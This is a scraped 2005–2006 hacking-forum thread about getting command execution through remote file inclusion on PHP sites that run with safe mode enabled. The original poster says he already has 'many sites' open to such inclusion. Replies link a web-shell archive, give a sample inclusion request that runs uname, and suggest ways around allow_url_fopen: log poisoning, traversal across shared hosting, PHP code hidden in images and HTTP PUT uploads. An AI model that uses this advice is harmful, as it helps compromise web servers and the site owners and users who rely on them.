| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 105 
  Members: 0 
  Total: 105 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Safemode in PHP |  |  
	| 
	
		|  Posted: Thu Mar 17, 2005 8:07 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| zer0-c00l |  | Advanced user |  |  
  |  |  |  | Joined: Jun 25, 2004 |  | Posts: 72 |  | Location: BRAZIL! |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hi there... 
 i got many sites with remote file inclusion and has safemode in PHP...
 
 somebody knows how to 'bypass' or other method to execute commands with safemode enabled?
 |  |  
		|  |  |  
	|  |  
	|  | Re: Safemode in PHP |  |  
	| 
	
		|  Posted: Fri Mar 18, 2005 7:47 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | zer0-c00l wrote: |  	  | Hi there... 
 i got many sites with remote file inclusion and has safemode in PHP...
 
 somebody knows how to 'bypass' or other method to execute commands with safemode enabled?
 | 
 
 yes here  http://www.sosvulnerable.net/waraxe/php-shells.rar by pass safemode tool25 you need configure therules  for fullpath you victim
 
 
 and upload all files click in  list on    and safemode OWNED
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Mar 18, 2005 8:25 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| zer0-c00l |  | Advanced user |  |  
  |  |  |  | Joined: Jun 25, 2004 |  | Posts: 72 |  | Location: BRAZIL! |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| there is a lot of files into the .rar :S 
 can u tell me what i have to do to use?
 
 maybe an example?
 
 thanks
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Mar 19, 2005 1:06 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| y3dips |  | Valuable expert |  |  
  |  |  |  | Joined: Feb 25, 2005 |  | Posts: 281 |  | Location: Indonesia |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | zer0-c00l wrote: |  	  | there is a lot of files into the .rar :S 
 can u tell me what i have to do to use?
 
 maybe an example?
 
 thanks
  | 
 
 Read d manual
 it wroten clearly there
 
 ---//snip---
 file :readme.txt
 
 Php shells for use remote and local   for local rename*.php - for remote rename *.svs not php
  (svs = sosvulnerable security) xD ----\\snip
 |  |  
		| 
		
			| _________________
 IO::y3dips->new(http://clog.ammar.web.id);
 |  |  |  
	|  |  
	| 
	
		|  Posted: Sat Apr 02, 2005 4:37 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| yame |  | Beginner |  |  
  |  |  |  | Joined: Apr 02, 2005 |  | Posts: 1 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| hey, 
 I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc  error.php?dir=..../tool25.doc?&cmd=uname%20-a )
 
  	  | Quote: |  	  | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
 | 
 
 is this also because of Safemode, or is it something else?
 how can someone bypass this?
 
 regards
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Apr 02, 2005 6:50 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| murdock |  | Advanced user |  |  
  |  |  |  | Joined: Mar 16, 2005 |  | Posts: 54 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Perhaps it has the option "allow_url_fopen" disabled in php.ini! |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Apr 03, 2005 10:14 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| y3dips |  | Valuable expert |  |  
  |  |  |  | Joined: Feb 25, 2005 |  | Posts: 281 |  | Location: Indonesia |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | yame wrote: |  	  | hey, 
 I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc  error.php?dir=..../tool25.doc?&cmd=uname%20-a )
 
  	  | Quote: |  	  | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
 | 
 
 is this also because of Safemode, or is it something else?
 how can someone bypass this?
 
 regards
 | 
 
 SAFEMODE restrict this function :
 dbmopen()
 dbase_open()
 filepro()
 filepro_rowcount()
 filepro_retrieve()
 ifx_*()
 ingres_*()
 mysql_*()
 pg_loimport()
 posix_mkfifo()
 putenv()
 move_uploaded_file()
 chdir()
 dl()
 shell_exec()
 exec()
 system()
 passthru()
 popen()
 mkdir()
 rmdir()
 rename()
 unlink()
 copy()
 chgrp()
 chown()
 chmod()
 touch()
 symlink()
 link()
 getallheaders()
 header()
 PHP_AUTH variables
 highlight_file()
 Show_source()
 parse_ini_file()
 set_time_limit()
 max_execution_time
 
 ... for more info read php manual
 i suggest u to read .chm form
 |  |  
		| 
		
			| _________________
 IO::y3dips->new(http://clog.ammar.web.id);
 |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Apr 03, 2005 1:13 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | yame wrote: |  	  | hey, 
 I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc  error.php?dir=..../tool25.doc?&cmd=uname%20-a )
 
  	  | Quote: |  	  | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
 | 
 
 is this also because of Safemode, or is it something else?
 how can someone bypass this?
 
 regards
 | 
 
 Like murdock allready mentioned, it is the "allow_url_fopen" setting in php.ini, which will restrict remote inclusion possibilities, not the safe mode. So what to do and how to bypass? Some possible choices:
 
 1. Using local files, for example some log files (if you can inject there php code)
 2. if the server is virtual server and there is many webistes on same ip address (most of the hosting works that way), you can try take over some other site on same server and then use directory traversal between virtual site root directories.
 3. pictures upload - all the image galleries and avatars and stuff - there is possibility to craft some valid jpg/gif/png/bmp picture, which will pass through all the checking routines and still it will contain some php code inside
  I have tested this on my local server and seems, that php parser is very sensitive about this kind of php code inclusion. But try to experiment with hex editor and finally it will work   4. test apache/iis server directories against "PUT" http method.
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Apr 03, 2005 4:13 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Apr 03, 2005 9:33 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| sp3x |  | Valuable expert |  |  
  |  |  |  | Joined: Feb 15, 2005 |  | Posts: 10 |  |  |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Mon Apr 04, 2005 6:08 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Mar 23, 2006 1:07 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Classics |  | Regular user |  |  
  |  |  |  | Joined: Mar 23, 2006 |  | Posts: 6 |  | Location: Nederland/Venlo |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hi 
 i have the self Problems to , i use C99 Shell and RuSH Shell !
 
 This Shell are very mighty , but not incredibly enough.
 
 Please Upload your safemod tool new , the old links is 404 not found.
 
 
 Thank you
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Mar 23, 2006 1:10 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Classics wrote: |  	  | Hi 
 i have the self Problems to , i use C99 Shell and RuSH Shell !
 
 This Shell are very mighty , but not incredibly enough.
 
 Please Upload your safemod tool new , the old links is 404 not found.
 
 
 Thank you
  | 
 
 Linux has changed his domain, here is new url:
 
 http://www.securityhead.com/waraxe/php-shells.rar
 
 
  |  |  
		|  |  |  
	|  |  
	|  | Re: Safemode in PHP |  |  
	| 
	
		|  Posted: Thu Apr 20, 2006 5:31 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| daemon_azazel |  | Regular user |  |  
  |  |  |  | Joined: Apr 16, 2006 |  | Posts: 17 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | LINUX wrote: |  	  | by pass safemode tool25 you need configure therules  for fullpath you victim 
 
 and upload all files click in  list on    and safemode OWNED
 | 
 
 have re-configured and uploaded on linux server with safemode on
 and with open basedir restrictions on all other folders and the tool
 did not worked - it wasn't able to execute any command and  list
 anything.
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Apr 23, 2006 7:40 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| outlawsys |  | Regular user |  |  
  |  |  |  | Joined: Jun 11, 2005 |  | Posts: 12 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| You can bypass safemod with an .cgi script so you can execute command. |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Remote file inclusion 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 2
			Goto page 1, 2Next
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |